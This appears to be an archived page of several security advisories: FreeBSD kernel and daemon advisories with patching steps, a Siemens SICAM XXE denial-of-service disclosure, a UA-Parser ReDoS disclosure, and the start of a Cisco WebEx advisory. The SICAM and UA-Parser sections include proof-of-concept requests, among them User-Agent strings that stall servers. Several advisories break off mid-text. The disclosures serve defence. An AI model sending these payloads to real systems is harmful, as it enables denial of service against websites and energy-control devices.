FreeBSD 12.0 attempts to handle the case where the receiving process does
not provide a sufficiently large buffer for an incoming control message
containing rights.  In particular, to avoid leaking the corresponding
descriptors into the receiving process' descriptor table, the kernel handles
the truncation case by closing descriptors referenced by the discarded
message.

The code which performs this operation failed to release a reference obtained
on the file corresponding to a received right.  This bug can be used to cause
the reference counter to wrap around and free the file structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from
a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch.asc
# gpg --verify fd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r343785
releng/12.0/  r343790
stable/11/r343786
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5596>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:02.fd.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1YFfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cK7+w/+JeFIVM0QQC1R4wJFmT3bBaRumxGCx5PN5Ufe7ub/ztwsKQKJeps1aiS3
fzw3Ck1K7+joeG+cNwZNihmAyEa2Hgk+FDhQBX531yrwF1jQ2A2oKGfkhs5e02Ng
k16MV9pVlNP1zQ3wFVBjFCCvBuVJ0A8XTxALY7ivZlj2edgSH1eL4SaP1mrSD2Xu
pR2amN7WkAaIqvATK0VkWjYp6kUXtI8CBtdP3hpKz88rpYoZfWxupqtghnxgjIqt
iuTOhbemvYuBvB+ErbtU/6Z4ffoHt9Csrk2MM56/RZRwyHmtC4CFqtxClrUpOoa2
2OcEbR8cZyEardSES78UBjbTwlOTVd5F4o86Q1bKytHjI72ycB5yKZkyiHmdJCjs
EhlaDC/rnHxdYGvBuiLqFcNU5tJiGawZZwyozCQz67dGD89QzKQurKEWQ1YJvMsW
ZwwJRSHrllUyJQBdqV/R3Qoaz2koeE9633jtqHDdUYKCZAgeFdic/6u9r4Rx2Nj5
JpTZU01bwvxNZPf35WbI2L+JbygR40b3FYbZ3skBqZylp+EkPGPxGpHGAxdKWeOy
rzGBukIuWnLy9pmJ574oTZymw8Psvu2DJL3C

FreeBSD Security Advisory FreeBSD-SA-19:01.syscall

2019-02-05 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:01.syscallSecurity Advisory
  The FreeBSD Project

Topic:  System call kernel data register leak

Category:   core
Module: kernel
Announced:  2019-02-05
Credits:Konstantin Belousov
Affects:All supported versions of FreeBSD.
Corrected:  2019-02-05 17:52:06 UTC (stable/12, 12.0-STABLE)
2019-02-05 18:05:05 UTC (releng/12.0, 12.0-RELEASE-p3)
2019-02-05 17:54:02 UTC (stable/11, 11.2-STABLE)
2019-02-05 18:07:45 UTC (releng/11.2, 11.2-RELEASE-p9)
CVE Name:   CVE-2019-5595

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The FreeBSD/amd64 architecture defines the SYSCALL instruction for syscalls,
and uses registers calling conventions for passing syscalls arguments and
return values in addition to the registers usage imposed by the SYSCALL and
SYSRET instructions in long mode.  In particular, the arguments are passed in
registers specified by the C ABI, and the content of the registers specified
as caller-save, is undefined after the return from syscall.

II.  Problem Description

The callee-save registers are used by kernel and for some of them (%r8, %r10,
and for non-PTI configurations, %r9) the content is not sanitized before
return from syscalls, potentially leaking sensitive information.

III. Impact

Typically an address of some kernel data structure used in the syscall
implementation, is exposed.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10m "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch.asc
# gpg --verify syscall.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch.asc
# gpg --verify syscall.patch.11.2.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r343781
releng/12.0/  r343788
stable/11/r343782
releng/11.2/  r343789
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5595>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:01.syscall.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1X9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKPZBAAlwCVtNNIuq0s8FB9LjLaVJww1WWmbVJbhw1TJyBV2yRCkWwGDLag3dJ0
EH8HwpWeL41lppjFeL6OMDZ2+wUnuShv3pAUGwodSRXsKWsp+aWqMPcNJifkVPxs
DENrziUHnXkbOnbnP25eA12j0ztCz8FjKoDh+wrjuY4BL8jzBK4ZJtmYaubrFEcD
GDStnEcvCNYDK8tf0rUW2lpv4oStTex5gFpZALPjq0g28kHPuctYzoOXOf9/So1i
0kwdstsIdgydsDCHv5nXij7IDohNo+5KEJuee1cIptKftmxPLuonXyP0PiO3W

CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS

2019-01-16 Thread Advisories

#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  SICAM A8000 Series
# Vendor:   Siemens
# CSNC ID:  CSNC-2019-002
# CVE ID:   CVE-2018-13798
# Subject:  SICAM Webinterface XXE DoS
# Risk: Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect:   Unauthenticated remotely exploitable
# Authors:  Emanuel Duss 
#   Nicolas Heiniger 
# Date: 2019-01-14
#
#

Introduction


The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device
range for telecontrol and automation applications in all areas of energy
supply. This device offers a web management interface for performing simple
management tasks.

During a penetration test, Compass found a denial-of-service vulnerability in
the Siemens SICAM web server. The web management interface is vulnerable
against the XXE billion laughs attack [2] using XML entities. Successful
exploitation can be performed unauthenticated over the network.

Affected


* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
-

When a login on the web management interface is performed, the following
request is sent to the server:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42
Content-Type: application/xml
Content-Length: 118
Connection: close




By modifying the XML message, it's possible to perform a billion laughs denial
of service attack against the web management interface:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42/
Content-Type: application/xml
Content-Length: 1679
Connection: close



  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
]>



The XML parser on the device tries to resolve the external entities. This will
consume all available memory and the web management interface does not respond
anymore.

If the web management interface is refreshed in the browser, the following
message appears:

The device is currently unreachable. Retrying to connect.

Other services on the device, like the one used by the ToolboxII for
configuring the device or the IEC104 service, will still work properly and are
not affected by this attack. Only the web management interface remains unusable
until the device is rebooted.

It's not possible to use XXE to read local or remote files using the SYSTEM
directive.

Vulnerability Classification


* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: 
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
---

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, it's also possible to restrict the access to the webserver on
port 80/tcp and 443/tcp using a firewall.

Acknowledgments
---

We thank Siemens for the coordinated disclosure.

Timeline


2018-05-28:Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28:Informed customer
2018-06-06:Initial vendor notification
2018-03-18:Vendor informed us that they will publish an advisory
2019-01-08:Siemens published advisory [3]
2019-01-11:Compass published advisory containing technical information

References
--

[1] 
https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt

X41 D-Sec GmbH Security Advisory X41-2018-009: ReDoS Vulnerability in UA-Parser

2019-01-10 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-SEC GmbH Security Advisory: X41-2018-009

ReDoS Vulnerability in UA-Parser

Severity Rating: Medium
Confirmed Affected Versions: 2015-05-14 and newer, commit
6fd6c261274254bcbbacd77ef4b12534c7f9923d
Confirmed Patched Versions: v0.6.0 released 2018-12-14, commit
010ccdc7303546cd22b9da687c29f4a996990014
Vendor: UA-Parser Project
Vendor URL: https://github.com/ua-parser
Vector: HTTP request
Credit: X41 D-SEC GmbH, Luc Gommans
Status: Public
CVE: CVE-2018-20164
CVSSv3 Score: 5.3
CVSSv3 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-009-uaparser/

Summary and Impact
==
The programming library UA-Parser uses regular expressions to identify
user agent strings. The complexity of some of the regular expressions
is such that an attacker can craft special patterns that keep the
server busy for a long time. By sending many requests in short order,
an attacker can exhaust the amount of processing power available. This
causes the website to become unavailable for legitimate visitors.

In common setups, the user agent string is parsed whenever a page is
visited. This means that anyone can abuse the bug, typically without
authentication. There are no common circumstances which would prevent
an attack from working reliably, i.e. an attacker can consistently and
repeatedly exploit the issue until the site has become unreachable.
For more information on regular expression-based denial of service,
see the OWASP page on ReDoS:

https://www.owasp.org/index.php/RegularexpressionDenialofService-ReDoS

The UA-Parser project consists of a core repository, uap-core, and
implementations in various languages. The regular expressions are
defined in the core project and each implementation is automatically
vulnerable.

Product Description
===
When a user agent (such as a browser) connects to a website, it
identifies itself with a 'user agent string'. This string helps the
server determine relevant content, for example to serve the
appropriate installer for visitors with different operating systems.
The UA-Parser project collects regular expressions that extract the
type of device and operating system from these strings.
Implementations in different languages are automatically vulnerable,
including the reference implementation in JavaScript:
<https://github.com/ua-parser/uap-ref-impl>

Proof of Concept

There are multiple vulnerable regular expressions. They are collected
in the file regex.yaml, for example on lines 911 and 4961. The regular
expression on line 911 is as follows:

(x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$

Any implementation using this library will hang for a few seconds (on
comodity hardware) when sending the following HTTP request:

GET / HTTP/1.0
User-Agent: x86_64

Normal user agent strings can be over a hundred bytes long: this
string of 35 bytes is not an abnormal request. Adding one more byte
makes the processing significantly longer.
This particular regular expression was introduced in September 2018. The
regular expression on line 4961 was introduced in May 2015 and can be
exploited as follows:

GET / HTTP/1.0
User-Agent:
HbbTV/1.1.1CE-HTML/1.1;THOM;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;LF

Each additional repetition of SW-Version/1; will multiply the
processing time by roughly a factor 6.2. Where eleven repetitions take
about seven seconds, fourteen repetitions already occupy a server for
half an hour.

Workarounds
===
As demonstrated, the input does not have to be particularly long to
exploit the issue. This may be the case, and a few hundred kilobytes
may slow down most regular expressions, but limiting the maximum
length is not a solution by itself.
The root cause is the regular expression, which should be limited in
complexity. This involves manual work and there is no solution that
can be applied to all regular expressions in the project.

To aid in identifying problematic regular expressions, one may use
projects such as <https://github.com/jagracey/RegEx-DoS>.

Timeline

2018-11-26 Issue found.
2018-11-29 Permission from customer to disclose to upstream.
2018-11-29 Requested secure channel from vendor for communication.
2018-12-04 Disclosed to vendor.
2018-12-14 Patch released by vendor, CVE number requested.
2018-12-15 CVE-2018-20164 assigned.
2019-01-10 Advisory released.

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of applicat

FreeBSD Security Advisory FreeBSD-SA-18:15.bootpd

2018-12-19 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:15.bootpd Security Advisory
  The FreeBSD Project

Topic:  bootpd buffer overflow

Category:   core
Module: bootpd
Announced:  2018-12-19
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2018-12-19 18:17:59 UTC (stable/12, 12.0-STABLE)
2018-12-19 18:21:07 UTC (releng/12.0, 12.0-RELEASE-p1)
2018-12-19 18:19:15 UTC (stable/11, 11.2-STABLE)
2018-12-19 18:22:25 UTC (releng/11.2, 11.2-RELEASE-p7)
CVE Name:   CVE-2018-17161

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The bootpd utility implements an Internet Bootstrap Protocol (BOOTP)
server as defined in RFC951, RFC1532, and RFC1533.

II.  Problem Description

Due to insufficient validation of network-provided data it may be possible
for a malicious attacker to craft a bootp packet which could cause a stack
buffer overflow.

III. Impact

It is possible that the buffer overflow could lead to a Denial of Service
or remote code execution.

IV.  Workaround

Firewall rules may be used to limit reception of bootp packets to only
trusted networks or hosts.  Note that the bootp protocol is typically
limited to a common layer 2 broadcast domain, although the bootpgw gateway
can forward bootp requests and responses between subnets.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Restart bootpd if it is running in standalone mode.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch.asc
# gpg --verify bootpd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/12/r342228
releng/12.0/  r342230
stable/11/r348229
releng/11.2/  r342231
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-18:15.bootpd.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwane5fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKfzg/+PhmA1AKfXFSkeJJPvdF/7hjKpWaCdVAyUZsuWH5L1Tmb4Lc/pLjw22Ba
Xh/sAKik6pa/nVTZCBgAqoCqmV8CdhScwvRZdVSP5CQ9vnM+6fFcybP0aCZOmiJC
NGAE8nIBdazqWJfNM9HUSIbdqEOtMlVcyE0Ni/TxzcAFdzFowfDnyRm1wqI4zhM7
YL7pU0kTYJfydjK540rHB1tNBaYHSJ/6ckK3tkjwjVgMsQwNSizKrPsqycoMlMmD
TqQMfDwU8W/jFLsr7OZE66eQBysSiuzYAv3IsipL+50SYgS0aoo3LwKrCcYGN6c/
S/0SOfNHDgd/7wregI5adKqWJceaqZCVedSVLm6ZaG1Vt3alIjczX9D7wIjuXPlD
AkSKa0HnmSwDC8yWLJYMxuny7vy3uBAUnPiwIT3RrsDC0b28/uwNPbeSbG0Wrf9F
21PDMfeCPc2Vr/TVj9uSIo20pNtVhy+tGbx1Ilsgi3POa3n7pTOuFWHMzQVe3rZA
DLYEbliPxpq9NFJ/2UZQg25weOD5ygwaYZnbsXAMY47D4kteeQOjzomgiacVhE56
oT8z804nGgGdCe4LpiHihDVzCbBvvuEPw9Edffzm7EWykp

FreeBSD Security Advisory FreeBSD-SA-18:14.bhyve

2018-12-04 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:14.bhyve  Security Advisory
  The FreeBSD Project

Topic:  Insufficient bounds checking in bhyve(8) device model

Category:   core
Module: bhyve
Announced:  2018-12-04
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2018-12-04 18:32:50 UTC (stable/11, 11.2-STABLE)
2018-12-04 18:38:32 UTC (releng/11.2, 11.2-RELEASE-p6)
CVE Name:   CVE-2018-17160

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The bhyve hypervisor uses the bhyve(8) program to emulate support for most
virtual devices used by guest operating systems.

II.  Problem Description

Insufficient bounds checking in one of the device models provided by bhyve(8)
can permit a guest operating system to overwrite memory in the bhyve(8)
processing possibly permitting arbitary code execution.

III. Impact

A guest OS using a firmware image can cause the bhyve process to crash, or
possibly execute arbitrary code on the host as root.

IV.  Workaround

The device model in question is only enabled when booting guests with a
firmware image such as the UEFI images from the bhyve-firmware package.
Guests booted using bhyveload(8) or grub2-bhyve are not affected.  Guests
using operating systems supported by bhyveload(8) or grub2-bhyve can be
booted using these tools as a workaround.

No workaround is available for guest operating systems such as Windows that
require a firmware image.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, restart guests using firmware images.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in https://www.FreeBSD.org/handbook/makeworld.html>.

Afterward, restart guests using firmware images.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/11/r341486
releng/11.2/  r341488
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17160>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-18:14.bhyve.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwGykdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKcIQ/+Ktt7+SZPoWZQmJv6LdT6qI+na0+/9LDwBoC+Tj37heFUnhcMTxDDH4o3
nexELxF1xHmRchooRKfJr7npa8CF4jBzp2PSb+783q6TrFKe90ohlmt56lRB6gJg
3IJX5TxvAvLsqTgwPyALqyy3H5C8cY3btHPsZIArK0WVRTB74K3mr3L3IRVTcMCv
9cbUZyDO21ZIDTB5h9FYGo+6bg8hvZztmromkxssqlKKS8TUltGr/H3k6EHlnEA9
rG+6kswIgyeXNFrdksD6ni7L5Z3lwR/DFiU2d/lageQZ6vgDUa3c0KMhepfelfJR
AiUtGpgfCDuHZ1NV2uyr9I6nPRHhdxPy3o2bF/B7+SLdn03tcZiO0tx3Wf68EQlt
jAYFuup7+TFKoupsHlb2fkQxNOeQCr6dF+ikJDVgwCqmx2zn9tDo/tWoNdH+Jylx
MDKsE369HOSRGR3Ua1ELEtOEzbGbcUHJyT6I1E2poctE61hYI+5te6pasY3ReN68
vyFMAo5ey0kJ6mi2YVcvDo2ZEb/GP1noJkdquYpIm8Ko0TPtivaMHXLIPcpLiJUc
fBZexGCXJnb8f6ClMMU12U6f3H35Hz1AUPG3MSWHGgoczQBZJ8PEC

FreeBSD Security Advisory FreeBSD-SA-18:13.nfs

2018-11-27 Thread FreeBSD Security Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:13.nfsSecurity Advisory
  The FreeBSD Project

Topic:  Multiple vulnerabilities in NFS server code

Category:   core
Module: nfs
Announced:  2018-11-27
Credits:Jakub Jirasek, Secunia Research at Flexera
Affects:All supported versions of FreeBSD.
Corrected:  2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE)
2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5)
CVE Name:   CVE-2018-17157, CVE-2018-17158, CVE-2018-17159

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

The Network File System (NFS) allows a host to export some or all of its file
systems so that other hosts can access them over the network and mount them
as if they were local.  FreeBSD includes both server and client
implementations of NFS.

II.  Problem Description

Insufficient and improper checking in the NFS server code could cause a
denial of service or possibly remote code execution via a specially crafted
network packet.

III. Impact

A remote attacker could cause the NFS server to crash, resulting in a denial
of service, or possibly execute arbitrary code on the server. 

IV.  Workaround

No workaround is available, but systems that do not provide NFS services are
not vulnerable.

Additionally, it is highly recommended the NFS service port (default port
number 2049) is protected via a host or network based firewall to prevent
arbitrary, untrusted clients from being able to connect.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc
# gpg --verify nfs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path  Revision
- -
stable/11/r340854
releng/11.2/  r341088
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision=NN>

VII. References

https://www.flexerasoftware.com/enterprise/company/about/secunia-research/>

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159>

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc>
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlv9n85fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKJEg//Umbe1QOUgV0Z6EsdlQffNMo9MHbAz75vCqeaibI36Ng9vmkLKGlS6nCA
5mKFS+BvM5CkekBaiQ6BR8t0xWsrFwX6JCUayQ2FsCSo4rwCZms3AIbvt68vjQAm
xWuQIMJzYku5+kALtcXXvVkLhMCaioVDpZmuPCO+rY79OVM4xP1MsnTfqEZSNo+n
Cz2urH4eO60YsM8w05coQ3hnOsUjTCk8yCh3+R/uYK1VouLDgD8q96T1eG2ozny6
vwEMK3AjmcpvFkTIF3/2I6TTA5K+Zd+nqzhzPM5HjbLZmdQV02NHcoGaZrK1wsQw
D+3wf8icBMfLt9rTUbEqVdvg5FRDkTo8/dH1wY85gWZ2wsSgCqI2wRuqBH4bp3bb
Gcf2+D4vgX6YY5cZ/wFDcYWpghhrmXUbgnH7PnyVfYB0Ufta9utgMOQKMS0mUWwM
DlHP+fL/A8lhPvXIhl1DtSa/TQAiAdMG1Jwkt

[CORE-2018-0011] - Cisco WebEx Meetings Elevation of Privilege Vulnerability

2018-11-27 Thread advisories

SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability

*1. *Advisory Information**

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability
Advisory ID: CORE-2018-0011
Advisory URL:
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability
Date published: 2018-11-27
Date of last update: 2018-11-27
Vendors contacted: Cisco
Release mode: Coordinated release

*2. *Vulnerability Information**

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-15442

*3. *Vulnerability Description**

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and
video are clear, and screen sharing is easier than ever. We help you
forget about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow a local attacker to elevate privileges. This
vulnerability is related to a previous security issue fixed by Cisco in
October.

*4. *Vulnerable Packages* *. Cisco Webex Meetings Desktop App releases prior to
33.6.4
. Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6

*5. *Vendor Information, Solutions and Workarounds**

Cisco released a new fixed version and updated its security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection

*6. *Credits**

This vulnerability was discovered and researched by Marcos Accossatto
